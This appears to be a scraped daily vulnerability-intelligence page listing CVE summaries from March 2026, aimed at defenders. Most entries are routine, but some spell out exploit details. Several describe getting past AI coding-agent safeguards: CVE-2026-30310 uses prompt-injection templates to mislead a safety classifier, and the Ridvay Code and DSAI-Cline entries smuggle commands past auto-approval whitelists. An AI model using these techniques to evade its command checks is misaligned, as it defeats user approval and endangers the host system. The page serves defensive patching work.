THREAT ALERT

ACT NOW CVE-2026-3502 7.8 Arbitrary code execution in TrueConf Client allows authenticated attackers on adjacent networks to deliver malicious updates due to missing integrity verification. The auto-update mechanism accepts unsigned or unverified payloads, enabling man-in-the-middle attackers with high privileges to substitute trojanized updates that execute with the application's permissions. EPSS data not available; no confirmed active exploitation (not in CISA KEV); publicly available exploit code not identified at time of analysis. CVSS 7.8 reflects the adjacent network attack vector and user interaction requirement, reducing immediate internet-scale risk. | EMERGENCY CVE-2026-33634 9.4 Trivy security scanner v0.69.4 was compromised in a supply chain attack where a threat actor used stolen credentials to publish malicious releases and force-push credential-stealing malware to GitHub Actions repositories. | EMERGENCY CVE-2026-3055 9.3 An insufficient input validation vulnerability exists in Citrix NetScaler ADC and NetScaler Gateway when configured as a SAML Identity Provider, allowing attackers to trigger a memory overread condition. The vulnerability affects both the NetScaler ADC and NetScaler Gateway products across multiple versions, and successful exploitation could lead to information disclosure by reading adjacent memory contents. While no CVSS score or EPSS data is currently published, the CWE-125 classification (Out-of-bounds Read) combined with the SAML IDP configuration context suggests moderate to high real-world risk for organizations relying on these devices for identity management. | EMERGENCY CVE-2026-33017 9.3 Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-33017, CVSS 9.3) in the public flow build API that allows attackers to execute arbitrary Python code by supplying malicious flow data. KEV-listed with public PoC, this vulnerability enables anyone with network access to a Langflow instance to achieve server compromise through the API that builds public flows without authentication. | ACT NOW CVE-2026-3910 8.8 Chrome's V8 JavaScript engine contains an inappropriate implementation (CVE-2026-3910, CVSS 8.8) that allows remote attackers to execute arbitrary code within the browser sandbox via crafted HTML pages. KEV-listed with public PoC, this V8 vulnerability affects all Chromium-based browsers and enables drive-by exploitation through any web page containing malicious JavaScript. | ACT NOW CVE-2026-3909 8.8 Google Chrome's Skia graphics library contains an out-of-bounds write (CVE-2026-3909, CVSS 8.8) enabling remote attackers to perform memory corruption through crafted HTML pages. KEV-listed with public PoC and patches available, this vulnerability in the core graphics rendering engine affects all Chromium-based browsers. | ACT NOW CVE-2025-14558 7.2 The rtsol(8) and rtsold(8) programs do not validate the domain search list options provided in router advertisement messages; the option body is passed to resolvconf(8) unmodified. resolvconf(8) is a shell script which does not validate its input. [CVSS 7.2 HIGH] | EMERGENCY CVE-2026-20131 10.0 Cisco Secure Firewall Management Center (FMC) contains a critical unauthenticated Java deserialization vulnerability (CVE-2026-20131, CVSS 10.0) in its web interface that enables remote code execution as root. KEV-listed with public PoC, this vulnerability allows complete compromise of the central management platform that controls all Cisco firewalls in the organization, enabling attackers to modify security policies, disable protections, and access all network traffic. | EMERGENCY CVE-2026-27971 9.8 RCE in Qwik JavaScript framework <= 1.19.0 via unsafe deserialization in server$ Runtime. EPSS 13.4% with PoC available. | ACT NOW CVE-2026-21385 7.8 A Qualcomm chipset vulnerability (CVE-2026-21385) causes memory corruption through improper integer handling during memory allocation, enabling local privilege escalation to kernel level. KEV-listed and patched, this vulnerability affects Qualcomm-based mobile devices and embedded systems, potentially impacting billions of Android devices globally. |

Daily vulnerability intelligence for defenders – fresh CVEs with exploitability signals, patch status, and action-oriented priorities from 17 sources.

CVEs published

Track vulnerabilities that matter to your stack

Personalized alerts, dashboards, and weekly digests – free.

Trending Now

Critical Watch

Attack Technique Trend

Prediction based on ZDI Disclosures & CVE data · 30 days

Analytics

Vendor Today – Quick Filter

Techniques

results

Sort:

Base Score

Vector String

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality (C)

Integrity (I)

Availability (A)

0 | 3.9| 6.9| 8.9| 10

NONE LOW MEDIUM HIGH CRITICAL

CVSS Filter – CVEs match

No CVEs match the selected criteria

Browse older vulnerabilities in Archive

Live Feed auto-refresh 60s

Vulnerability Intelligence — March 31, 2026

244 CVEs tracked today. 32 Critical, 65 High, 135 Medium, 12 Low.

CVE-2026-3356 CRITICAL CVSS 9.3
Anritsu MS27100A/MS27101A/MS27102A/MS27103A Remote Spectrum Monitors contain a design-level authentication bypass allowing unauthenticated remote attackers to fully access and manipulate the management interface. This is not a configuration weakness but an inherent architectural flaw (CWE-306: Missing Authentication) with CVSS 9.3 critical severity. No public exploit identified at time of analysis, but trivial exploitation is expected given the complete absence of authentication mechanisms. ICS-CERT advisory confirms the vulnerability affects operational technology environments.

Authentication Bypass
CVE-2026-1579 CRITICAL CVSS 9.3
Unauthenticated remote code execution in PX4 Autopilot via MAVLink protocol allows network attackers to execute arbitrary commands through SERIAL_CONTROL messages when message signing is disabled. The MAVLink 2.0 protocol in PX4 accepts unsigned messages by default, enabling any party with network access to the MAVLink interface to send interactive shell commands without cryptographic authentication. EPSS data not provided; no KEV status confirmed; reported by ICS-CERT indicating potential operational technology impact.

Authentication Bypass
CVE-2026-34532 CRITICAL CVSS 9.1
Parse Server Cloud Function validator bypass allows unauthenticated remote attackers to execute protected server-side functions by exploiting prototype chain traversal. Attackers append 'prototype.constructor' to Cloud Function URLs to circumvent access controls (requireUser, requireMaster, custom validators), enabling unauthorized execution of backend business logic. Affects Parse Server versions prior to 8.6.67 and 9.7.0-alpha.11. No public exploit identified at time of analysis, though the attack vector is network-accessible with low complexity (CVSS:4.0 AV:N/AC:L/PR:N). The vulnerability stems from inconsistent prototype chain resolution between handler and validator stores (CWE-863: Incorrect Authorization).

Node.js Authentication Bypass
CVE-2026-34449 CRITICAL CVSS 9.6
Remote code execution in SiYuan desktop application (versions prior to 3.6.2) allows unauthenticated remote attackers to execute arbitrary code with full operating system privileges through CORS misconfiguration. A malicious website can inject JavaScript into the Electron-based application's Node.js context via the permissive API (Access-Control-Allow-Origin: * with Access-Control-Allow-Private-Network: true), which executes with OS-level access when the user next opens SiYuan's interface. No public exploit identified at time of analysis, though CVSS 9.6 (Critical) reflects network-accessible attack vector with low complexity requiring only user interaction (visiting malicious site while SiYuan runs). EPSS data not provided, but the combination of Electron framework exploitation, RCE impact, and trivial attack complexity suggests elevated real-world risk for desktop users.

RCE Cors Misconfiguration Node.js
CVE-2026-34448 CRITICAL CVSS 9.0
Stored cross-site scripting (XSS) in SiYuan personal knowledge management system escalates to arbitrary operating system command execution on desktop clients. Authenticated attackers with low privileges can inject malicious URLs into Attribute View asset fields that execute JavaScript when victims view Gallery or Kanban layouts with "Cover From -> Asset Field" enabled. The Electron desktop client's configuration (nodeIntegration enabled, contextIsolation disabled) allows the XSS payload to break sandbox boundaries and execute arbitrary commands under the victim's OS account. CVSS 9.0 (Critical) with network attack vector, low complexity, and cross-scope impact. Vendor-released patch: version 3.6.2. No public exploit identified at time of analysis, though technical details are disclosed in GitHub advisory GHSA-rx4h-526q-4458.

XSS Command Injection
CVE-2026-34406 CRITICAL CVSS 9.4
Privilege escalation in APTRS (Automated Penetration Testing Reporting System) prior to version 2.0.1 allows any user to escalate their own account or modify any other user account to superuser status by submitting a crafted POST request to /api/auth/edituser/<pk> with an is_superuser field set to true. The CustomUserSerializer fails to mark is_superuser as read-only despite including it in serializer fields, and the edit_user view lacks validation to prevent non-superusers from modifying this critical field. No public exploit code or active exploitation has been identified at time of analysis, but the vulnerability is trivial to exploit given basic HTTP client access to the endpoint.

Python Privilege Escalation
CVE-2026-34162 CRITICAL CVSS 10.0
Unauthenticated HTTP proxy abuse in FastGPT (AI Agent platform) prior to v4.14.9.5 allows remote attackers to relay arbitrary HTTP requests through the server. The /api/core/app/httpTools/runTool endpoint accepts user-controlled URLs, methods, headers, and body parameters without authentication, functioning as an open proxy for network pivoting, credential theft, and internal network reconnaissance. CVSS 10.0 (Critical) with network attack vector and no privileges required. No public exploit identified at time of analysis, though exploitation is trivial given the exposed endpoint design. EPSS data not available.

Authentication Bypass
CVE-2026-33579 CRITICAL CVSS 9.4
Privilege escalation in OpenClaw (pre-2026.3.28) allows unauthenticated remote attackers to gain administrative access by exploiting missing scope validation in the device pairing approval workflow. The /pair approve command fails to forward caller scopes during approval checks, enabling attackers with basic pairing privileges-or potentially no privileges given the CVSS PR:N vector-to approve device requests with elevated admin scopes. EPSS data not available; no public exploit identified at time of analysis, though the CVSS 9.8 reflects trivial exploitation due to network accessibility, low complexity, and no authentication barrier. Vendor-released patch: commit e403dec (2026.3.28+).

Privilege Escalation Authentication Bypass
CVE-2026-32917 CRITICAL CVSS 9.2
Remote command injection in OpenClaw's iMessage attachment staging mechanism (versions prior to 2026.3.13) allows unauthenticated network attackers to execute arbitrary commands on configured remote hosts via malicious attachment paths. The critical flaw stems from unsanitized shell metacharacters passed directly to SCP operations, achieving full system compromise (CVSS 9.8) when remote attachment staging is enabled. EPSS data and KEV status not provided; publicly available exploit code exists (GitHub commit demonstrates the fix, implying POC-level understanding in security community).

Command Injection
CVE-2026-32916 CRITICAL CVSS 9.2
Authorization bypass in OpenClaw 2026.3.7 through 2026.3.10 enables remote unauthenticated attackers to execute privileged gateway operations through plugin subagent routes. The vulnerability exploits synthetic operator clients with excessive administrative scopes, allowing attackers to delete sessions and execute agent commands without authentication. CVSS 7.7 (High) with network attack vector but high complexity (AC:H). No public exploit identified at time of analysis, though technical details are available via GitHub security advisory and VulnCheck analysis.

Authentication Bypass
CVE-2026-32871 CRITICAL CVSS 10.0
Server-Side Request Forgery (SSRF) in FastMCP's OpenAPIProvider allows authenticated attackers to access arbitrary backend endpoints through path traversal injection in OpenAPI path parameters. The vulnerability arises from improper URL encoding in the RequestDirector._build_url() method, enabling attackers to escape intended API prefixes using '../' sequences and reach internal administrative or sensitive endpoints while inheriting the MCP provider's authentication context. This affects the fastmcp Python package and enables privilege escalation beyond the OpenAPI specification's intended API surface. No public exploit identified at time of analysis, though detailed proof-of-concept code exists in the GitHub advisory demonstrating traversal to /admin endpoints.

SSRF Path Traversal Authentication Bypass Privilege Escalation Python
CVE-2026-32714 CRITICAL CVSS 9.8
SQL injection in SciTokens Python library allows unauthenticated remote code execution against the local SQLite database. The KeyCache class improperly uses str.format() to construct SQL queries with attacker-controlled issuer and key_id parameters, enabling arbitrary SQL command execution. Affects all versions prior to 1.9.6. CVSS 9.8 (Critical) with network attack vector, low complexity, and no privileges required. No CISA KEV listing indicates no confirmed active exploitation at time of analysis, though the straightforward nature of SQL injection and public patch details increase exploitation risk.

Python SQLi
CVE-2026-30880 CRITICAL CVSS 9.2
OS command injection in baserCMS installer prior to version 5.2.3 allows remote attackers to execute arbitrary system commands during the installation process. The vulnerability exists in the installer component and has been patched in version 5.2.3. Attack complexity appears low given the installer context, though CVSS metrics are unavailable for detailed severity assessment.

Command Injection
CVE-2026-30877 CRITICAL CVSS 9.1
OS command injection in baserCMS update functionality allows authenticated administrators to execute arbitrary commands on the server with application privileges. Affects baserCMS versions prior to 5.2.3. Vendor-released patch available in version 5.2.3. CVSS 9.1 reflects high impact with changed scope, though exploitation requires high-privilege administrator access (PR:H). No public exploit identified at time of analysis. EPSS data not provided, but attack complexity is low (AC:L) once admin credentials are obtained.

Command Injection
CVE-2026-30314 CRITICAL CVSS 9.8
Remote code execution in Ridvay Code's command auto-approval module allows unauthenticated attackers to bypass whitelist security controls via shell command substitution syntax (e.g., $(...) or backticks) embedded in command arguments. The vulnerability stems from insufficient regular expression validation that fails to detect command injection payloads, permitting an attacker to execute arbitrary OS commands with automatic approval. No user interaction is required; a crafted command such as git log --grep="$(malicious_command)" will be misidentified as safe and executed by the underlying shell, resulting in remote code execution.

RCE Command Injection
CVE-2026-30312 CRITICAL CVSS 9.8
Remote code execution in DSAI-Cline's command auto-approval module allows unauthenticated attackers to bypass whitelist validation by embedding literal newline characters within command payloads, forcing the system to execute arbitrary OS commands without user interaction. The vulnerability exploits ineffective string-based parsing that fails to sanitize newline separators, enabling attackers to chain whitelisted commands (e.g., git log) with malicious code that PowerShell interprets as sequential commands. No CVSS score, EPSS data, or KEV confirmation available; exploitation status and real-world impact remain unconfirmed.

RCE Command Injection
CVE-2026-30311 CRITICAL CVSS 9.8
Remote code execution in Ridvay Code's command auto-approval module allows unauthenticated attackers to bypass whitelist protections via shell command substitution syntax ($(…) and backticks) embedded in seemingly benign git commands, achieving code execution without user interaction. The vulnerability exploits inadequate regular expression validation that fails to detect shell metacharacters in command arguments, enabling attackers to inject arbitrary commands that execute with the privileges of the Ridvay Code process.

RCE Command Injection
CVE-2026-30310 CRITICAL CVSS 9.8
Prompt injection attacks in Sixth's automatic terminal command execution feature bypass the model-based safety classification system, allowing attackers to execute arbitrary commands without user approval by wrapping malicious payloads in templates that mislead the AI into treating them as safe operations.

Command Injection
CVE-2026-30286 CRITICAL CVSS 9.8
Arbitrary file overwrite in Funambol Zefiro Cloud v32.0.2026011614 allows attackers to overwrite critical internal files during the file import process, enabling remote code execution or information disclosure. The vulnerability affects the cloud application and its associated mobile client. No CVSS score or official vendor patch has been assigned as of analysis time, though the reported impact (RCE/information exposure) is severe.

Path Traversal RCE Information Disclosure
CVE-2026-30285 CRITICAL CVSS 9.8
Arbitrary file overwrite in Zora: Post, Trade, Earn Crypto v2.60.0 enables attackers to overwrite critical internal files through the file import process, resulting in remote code execution or information exposure. The vulnerability affects the cryptocurrency trading application's file handling mechanism, allowing unauthenticated remote attackers to inject malicious content into system-critical files. No active exploitation has been confirmed at time of analysis, though the attack vector and impact severity warrant immediate investigation by affected users.

Path Traversal RCE Information Disclosure
CVE-2026-30283 CRITICAL CVSS 9.8
Arbitrary file overwrite in PEAKSEL D.O.O. NIS Animal Sounds and Ringtones v1.3.0 allows attackers to overwrite critical internal files during the file import process, enabling remote code execution or sensitive information exposure. The vulnerability affects the application's import functionality without requiring authentication. No public exploit code or active exploitation has been independently confirmed at the time of analysis.

Path Traversal RCE Information Disclosure
CVE-2026-30282 CRITICAL CVSS 9.0
Arbitrary file overwrite in UXGROUP LLC Cast to TV Screen Mirroring v2.2.77 enables remote attackers to overwrite critical application files through a malicious file import process, resulting in remote code execution or information disclosure. No CVSS score, exploit code availability, or active exploitation status confirmed from available data.

Path Traversal RCE Information Disclosure
CVE-2026-30281 CRITICAL CVSS 9.8
Arbitrary file overwrite in MaruNuri LLC v2.0.23 allows remote attackers to overwrite critical internal files during the file import process, enabling arbitrary code execution or information exposure. No CVSS score, exploit code availability, or active exploitation status is documented in available sources.

RCE Information Disclosure
CVE-2026-30278 CRITICAL CVSS 9.8
Arbitrary file overwrite in FLY is FUN Aviation Navigation v35.33 permits attackers to overwrite critical internal files through the file import process, enabling remote code execution or information disclosure. No CVSS score, CVE severity classification, or patch status has been established. The vulnerability affects a niche aviation navigation software product with limited public disclosure.

Path Traversal RCE Information Disclosure
CVE-2026-30276 CRITICAL CVSS 9.8
Arbitrary file overwrite in DeftPDF Document Translator v54.0 permits attackers to overwrite critical internal files through the file import mechanism, potentially enabling remote code execution or sensitive information exposure. The vulnerability affects DeftPDF Document Translator specifically at version 54.0 and is documented by academic researchers at Fudan University's security systems group. Attack complexity and authentication requirements cannot be definitively assessed due to missing CVSS vector data, though the file import process suggests user interaction may be required.

RCE Information Disclosure
CVE-2026-21861 CRITICAL CVSS 9.1
OS command injection in baserCMS core update functionality allows authenticated administrators to execute arbitrary system commands on the server. The vulnerability affects baserCMS versions prior to 5.2.3, stemming from improper sanitization of user-controlled input passed directly to exec() functions. With CVSS 9.1 (Critical) due to network accessibility, low complexity, and cross-scope impact, this represents a severe risk in multi-tenant or managed hosting environments where administrative boundaries must be enforced. EPSS data not available, no CISA KEV listing confirmed, and authentication requirements (PR:H) limit exploit surface to compromised or malicious administrator accounts.

Command Injection
CVE-2026-4317 CRITICAL CVSS 9.3
SQL injection in Umami Software's web analytics application allows authenticated attackers with low privileges to execute arbitrary SQL commands via unsanitized timezone parameter. The vulnerability affects raw query implementations (prisma.rawQuery, $queryRawUnsafe, ClickHouse raw queries) with CVSS 9.3 severity. Successful exploitation enables database compromise and execution of dangerous functions. Patch available per vendor advisory; no public exploit identified at time of analysis, though the straightforward attack vector (network-accessible, low complexity, low privileges required) presents significant risk for deployments with untrusted authenticated users.

SQLi
CVE-2026-3300 CRITICAL CVSS 9.8
Remote code execution in Everest Forms Pro plugin for WordPress ≤1.9.12 allows unauthenticated attackers to execute arbitrary PHP code on the server via the Complex Calculation feature. Attackers can inject malicious PHP through any string-type form field (text, email, URL, select, radio) due to unsafe concatenation into eval() without proper escaping. This vulnerability carries a 9.8 CVSS score with maximum impact (confidentiality, integrity, availability) and requires no authentication or user interaction, representing a critical immediate threat to all installations using the affected plugin versions.

WordPress PHP RCE Code Injection
CVE-2026-3107 CRITICAL CVSS 9.3
Stored cross-site scripting in Teampass password manager versions before 3.1.5.16 enables unauthenticated remote attackers to inject malicious JavaScript through the password import functionality, achieving persistent code execution in victims' browsers including administrators. CVSS 9.3 (Critical) with EPSS data unavailable, no KEV listing, and patch available per vendor advisory. Attack requires no authentication (PR:N) and low complexity (AC:L), creating significant risk for organizational password compromise and lateral movement.

XSS PHP
CVE-2026-3106 CRITICAL CVSS 9.3
Blind Cross-Site Scripting in Teampass password manager versions prior to 3.1.5.16 allows unauthenticated remote attackers to execute arbitrary JavaScript in administrator browsers via malicious username input during failed login attempts. The vulnerability achieves high confidentiality and integrity impact (CVSS 9.3) because malicious code is stored and automatically executed when administrators review failed authentication logs, enabling potential session hijacking, credential theft, or administrative account compromise. No active exploitation confirmed via CISA KEV, though the attack requires no authentication and minimal complexity.

XSS PHP
CVE-2026-0596 CRITICAL CVSS 9.6
Command injection in MLflow's MLServer integration allows unauthenticated adjacent network attackers to execute arbitrary commands when models are served with enable_mlserver=True. Unsanitized model_uri parameters embedded in bash -c commands enable shell metacharacter exploitation (command substitution via $() or backticks). With CVSS 9.6 (Critical) and adjacent network attack vector, this poses significant risk in multi-tenant MLOps environments where lower-privileged users can control model URIs served by higher-privileged services. No public exploit code identified at time of analysis, with EPSS data not yet available for this recent CVE.

Command Injection Privilege Escalation
CVE-2025-15618 CRITICAL CVSS 9.1
Business::OnlinePayment::StoredTransaction through version 0.01 uses cryptographically weak secret key generation based on MD5 hashing of a single rand() call, exposing encrypted credit card transaction data to key recovery attacks. The vulnerability affects Perl module users who rely on this library for payment processing, allowing attackers to potentially decrypt stored transaction records. No CVSS score was assigned, but the direct compromise of payment card encryption represents critical risk to financial data confidentiality.

Information Disclosure
CVE-2026-34784 HIGH CVSS 8.2
Parse Server versions prior to 8.6.71 and 9.7.1-alpha.1 allow HTTP Range requests to bypass the afterFind trigger and its validators when downloading files from streaming-capable storage adapters like GridFS, enabling unauthorized access to protected files that should be restricted by authentication or authorization logic. This authentication bypass affects all deployments using affected versions with file protection policies enforced via afterFind triggers.

Node.js Authentication Bypass
CVE-2026-34731 HIGH CVSS 7.5
Unauthenticated attackers can remotely terminate any active live stream in WWBN AVideo 26.0 and prior by sending crafted POST requests to the on_publish_done.php endpoint in the Live plugin. The vulnerability combines two weaknesses: an unauthenticated stats.json.php endpoint that exposes active stream keys, and the on_publish_done.php RTMP callback handler that processes stream termination requests without authentication or authorization checks. This enables complete denial-of-service against all platform live streaming functionality. CVSS 7.5 (High) with network attack vector, low complexity, and no privileges required. No vendor-released patch identified at time of analysis; EPSS data not available.

PHP Authentication Bypass
CVE-2026-34605 HIGH CVSS 8.6
Cross-site scripting (XSS) in SiYuan personal knowledge management system versions 3.6.0-3.6.1 allows remote attackers to execute arbitrary JavaScript via the unauthenticated /api/icon/getDynamicIcon endpoint by bypassing SVG sanitization using XML namespace-prefixed element names. The vulnerability exploits a parser inconsistency where Go's HTML5 parser treats 'x:script' as a distinct tag while browsers' XML parsers resolve the namespace prefix to execute the script. Publicly available exploit code exists (GitHub issue #17246 documents the bypass technique), though no CISA KEV listing indicates mass exploitation campaigns at time of analysis.

XSS
CVE-2026-34585 HIGH CVSS 8.6
Stored cross-site scripting (XSS) in SiYuan personal knowledge management system versions prior to 3.6.2 escalates to remote code execution in the Electron desktop client. Attackers craft malicious .sy.zip import files containing HTML entities mixed with raw special characters that bypass server-side attribute escaping, injecting event handlers into imported notes. When victims open the compromised note in the Electron client, injected JavaScript executes with full Node/Electron API access, enabling arbitrary code execution. CVSS 8.6 (High) with local attack vector requiring user interaction; no public exploit identified at time of analysis.

XSS RCE
CVE-2026-34573 HIGH CVSS 8.2
GraphQL query complexity validator in Parse Server allows remote denial-of-service via crafted queries with binary fan-out fragment spreads, blocking the Node.js event loop for seconds with a single unauthenticated request. Parse Server versions prior to 8.6.68 and 9.7.0-alpha.12 are affected when requestComplexity.graphQLDepth or requestComplexity.graphQLFields options are enabled. EPSS data not provided; no public exploit identified at time of analysis. CVSS 8.2 (High) reflects network-accessible attack with low complexity requiring no privileges, causing high availability impact.

Node.js Information Disclosure
CVE-2026-34529 HIGH CVSS 7.6
Stored XSS in File Browser's EPUB preview function (versions ≤v2.62.1) allows authenticated attackers to steal JWT tokens and escalate privileges by uploading malicious EPUB files. The vulnerability arises from passing allowScriptedContent:true to the epub.js library combined with an ineffective iframe sandbox (allow-scripts + allow-same-origin), enabling JavaScript in crafted EPUBs to access parent frame localStorage. CVSS 7.6 (AV:N/AC:L/PR:L/UI:R/S:C). No public exploit identified at time of analysis beyond the detailed PoC in the advisory. EPSS data not available. Vendor-released patch available per GitHub advisory. Low-privilege users with file upload permissions can weaponize this to compromise administrator sessions.

XSS Privilege Escalation Python Docker Mozilla
CVE-2026-34528 HIGH CVSS 8.1
File Browser's self-registration mechanism grants arbitrary shell command execution to unauthenticated attackers when administrators enable signup alongside server-side execution. The signupHandler inherits Execute permissions and Commands lists from default user templates but only strips Admin privileges, allowing newly registered users to immediately execute arbitrary commands via WebSocket with the process's full privileges. Vendor patch available. EPSS data not provided, but the specific configuration requirement (signup + enableExec + Execute in defaults) significantly narrows the attack surface despite the network-accessible, unauthenticated attack vector (CVSS 8.1 High). No confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis beyond the detailed proof-of-concept in the advisory.

Privilege Escalation Node.js
CVE-2026-34503 HIGH CVSS 8.6
WebSocket session fixation in OpenClaw before version 2026.3.28 enables attackers to maintain unauthorized access after credential revocation. The vulnerability permits unauthenticated remote attackers (CVSS PR:N) to exploit persistent WebSocket connections that fail to terminate when device tokens are revoked, resulting in high confidentiality impact. No public exploit identified at time of analysis, though the attack vector is network-accessible with low complexity. EPSS data not available; affects OpenClaw deployments with WebSocket-based device communication.

Authentication Bypass
CVE-2026-34453 HIGH CVSS 7.5
Unauthenticated information disclosure in SiYuan personal knowledge management system versions before 3.6.2 allows remote attackers to retrieve confidential content from password-protected documents via the publish service's bookmark API endpoint. The vulnerability bypasses document-level access controls by treating nil authentication contexts as authorized during bookmark filtering, exposing any bookmarked blocks without password verification. CVSS 7.5 (High) with network-based exploitation requiring no privileges or user interaction; no public exploit identified at time of analysis, though the security advisory provides detailed technical disclosure.

Authentication Bypass
CVE-2026-34394 HIGH CVSS 8.1
Cross-site request forgery in WWBN AVideo 26.0 and earlier enables remote attackers to reconfigure critical plugin settings through forged requests targeting admin/save.json.php. The endpoint lacks CSRF token validation while the application sets SameSite=None cookies, allowing attackers to manipulate payment processors, authentication providers, and cloud storage credentials by tricking authenticated administrators into visiting malicious pages. No vendor-released patch identified at time of analysis. EPSS data unavailable; not listed in CISA KEV; no public exploit identified at time of analysis, though exploitation requires only standard CSRF techniques.

CSRF PHP
CVE-2026-34381 HIGH CVSS 7.5
Unauthenticated remote access to restricted documents in Admidio 5.0.0-5.0.7 Docker deployments allows disclosure of role-protected files. The Docker image's Apache configuration disables .htaccess processing (AllowOverride None), bypassing intended access controls on uploaded documents. Attackers can directly retrieve files via HTTP without authentication using paths disclosed in upload response JSON. CVSS 7.5 (High) with network-based attack vector and no authentication required. No public exploit identified at time of analysis, though exploitation is straightforward given the configuration flaw.

Apache Docker Authentication Bypass
CVE-2026-34367 HIGH CVSS 7.6
Server-Side Request Forgery in InvoiceShelf prior to version 2.2.0 allows authenticated high-privilege users to force the server to make arbitrary HTTP requests through the invoice PDF generation module. Attackers can inject malicious HTML into the invoice Notes field, which Dompdf processes without sanitization, fetching remote resources and potentially accessing internal network services or exfiltrating data via out-of-band channels. EPSS data not available; no public exploit identified at time of analysis. The CVSS score of 7.6 reflects high confidentiality impact with scope change, indicating potential for significant internal network reconnaissance.

SSRF
CVE-2026-34366 HIGH CVSS 7.6
Server-Side Request Forgery in InvoiceShelf's PDF payment receipt generation allows authenticated high-privilege users to make arbitrary HTTP requests from the server through unsanitized HTML injection in payment Notes fields. The vulnerability affects InvoiceShelf versions prior to 2.2.0, leveraging the Dompdf library's resource fetching behavior to pivot attacks against internal network resources or exfiltrate data via DNS/HTTP channels. CVSS 7.6 reflects network-accessible attack with low complexity but high privileges required and cross-scope impact. No public exploit identified at time of analysis, with EPSS data unavailable for this recent CVE. Vendor-released patch available in version 2.2.0 per GitHub security advisory.

SSRF
CVE-2026-34365 HIGH CVSS 7.6
Server-Side Request Forgery in InvoiceShelf 2.x allows authenticated administrators to exfiltrate internal network data via malicious HTML in estimate PDF generation. The vulnerability stems from unsanitized user input passed to the Dompdf rendering library, enabling arbitrary HTTP requests from the server. Exploitable through PDF preview and customer view endpoints without requiring email functionality. Patched in version 2.2.0. CVSS 7.6 reflects high confidentiality impact with scope change (C:H/S:C), requiring high privileges (PR:H) but low attack complexity over network vector. No confirmed active exploitation (not in CISA KEV), but the technical barrier is low for authenticated attackers with administrative access.

SSRF
CVE-2026-34240 HIGH CVSS 7.5
JWT token forgery in appsup-dart/jose library (versions prior to 0.3.5+1) enables remote attackers to bypass authentication by embedding attacker-controlled public keys in JOSE headers. The library incorrectly accepts header-supplied 'jwk' parameters as trusted verification keys without validating they exist in the application's trusted keystore, allowing unauthenticated attackers to sign arbitrary tokens with their own key pairs. EPSS data not available; no public exploit identified at time of analysis, though exploitation requires only standard JWT manipulation tools.

Jwt Attack Information Disclosure
CVE-2026-34200 HIGH CVSS 7.7
Nhost CLI MCP server before version 1.41.0 allows cross-origin requests without authentication when explicitly configured to listen on a network port, enabling malicious websites to invoke privileged tools using developer credentials. The vulnerability requires two explicit non-default configuration steps and does not affect the default configuration, significantly limiting real-world exposure.

Authentication Bypass
CVE-2026-34163 HIGH CVSS 7.7
Server-Side Request Forgery (SSRF) in FastGPT's Model Context Protocol (MCP) tools endpoints allows authenticated attackers to probe internal networks, access cloud metadata services (e.g., AWS/GCP instance credentials), and interact with backend databases like MongoDB and Redis. Affects FastGPT versions prior to 4.14.9.5. The vulnerability has CVSS 7.7 (High) with scope change indicating potential lateral movement to other system components. EPSS data not available; no confirmed active exploitation (not in CISA KEV). Public exploit code exists via GitHub security advisory GHSA-x9vj-5m4j-9mfv with technical details and proof-of-concept guidance.

SSRF Redis
CVE-2026-34155 HIGH CVSS 7.2
Integer overflow in RAUC versions prior to 1.15.2 allows signature bypass on 'plain' format bundles exceeding 2 GiB payload size, enabling attackers with bundle modification capability to alter unverified payload portions while retaining a valid signature. This affects embedded Linux systems relying on RAUC for secure firmware updates.

Buffer Overflow
CVE-2026-34054 HIGH CVSS 7.8
Local privilege escalation via hardcoded build path in vcpkg's OpenSSL binaries affects Windows users of the C/C++ package manager prior to version 3.6.1#3. The vulnerability allows authenticated local attackers with low privileges to achieve high confidentiality, integrity, and availability impact (CVSS 7.8) by exploiting the hardcoded openssldir path that references the original build machine. Upstream fix available (PR #50518, commit 5111afd); patched version 3.6.1#3 released. No public exploit identified at time of analysis, with EPSS data not available for this recent CVE.

OpenSSL Microsoft Information Disclosure
CVE-2026-33581 HIGH CVSS 7.1
OpenClaw before version 2026.3.24 contains a sandbox bypass vulnerability in its message tool that allows local attackers to read arbitrary files by manipulating mediaUrl and fileUrl alias parameters to circumvent localRoots validation. The vulnerability exploits improper input sanitization in file request routing, enabling unauthorized disclosure of sensitive files outside the intended sandbox directory without requiring authentication or user interaction.

Path Traversal
CVE-2026-33577 HIGH CVSS 8.6
Privilege escalation in OpenClaw versions prior to 2026.3.28 enables unauthenticated remote attackers to approve node pairings with unauthorized elevated scopes, bypassing authorization controls through missing callerScopes validation in the node pairing approval mechanism. This vulnerability (CWE-863: Incorrect Authorization) allows attackers to extend privileges onto paired nodes beyond their intended authorization level. CVSS 9.8 Critical with network-accessible attack vector requiring no authentication or user interaction. No public exploit identified at time of analysis, with EPSS data not available for this recent CVE.

Authentication Bypass
CVE-2026-33276 HIGH CVSS 8.6
Stored cross-site scripting (XSS) in Checkmk 2.5.0 beta versions before 2.5.0b2 allows authenticated users with host or service creation permissions to inject malicious JavaScript that executes in the browsers of other users when they perform searches via the Unified Search feature, potentially enabling session hijacking, credential theft, or administrative account compromise.

XSS
CVE-2026-32982 HIGH CVSS 8.7
Telegram bot token exposure in OpenClaw's media download error handling allows unauthenticated remote attackers to harvest sensitive API credentials through information disclosure. Versions prior to 2026.3.13 embed complete Telegram file URLs containing bot tokens in MediaFetchError exceptions, leaking credentials to application logs and error surfaces. With EPSS data unavailable and no CISA KEV listing, no public exploit identified at time of analysis, though the vulnerability requires minimal technical sophistication to exploit given the network-accessible attack vector and low complexity (CVSS:3.1/AV:N/AC:L/PR:N).

Information Disclosure
CVE-2026-32976 HIGH CVSS 7.1
OpenClaw before version 2026.3.11 allows authenticated users to bypass authorization restrictions and modify protected configuration on sibling accounts through channel commands, despite configWrites: false restrictions. An attacker with legitimate access to one account can execute /config set commands targeting another account's channel provider configuration, achieving unauthorized modification of settings across account boundaries. This vulnerability is neither actively exploited nor known to have public proof-of-concept code available.

Authentication Bypass
CVE-2026-32971 HIGH CVSS 7.3
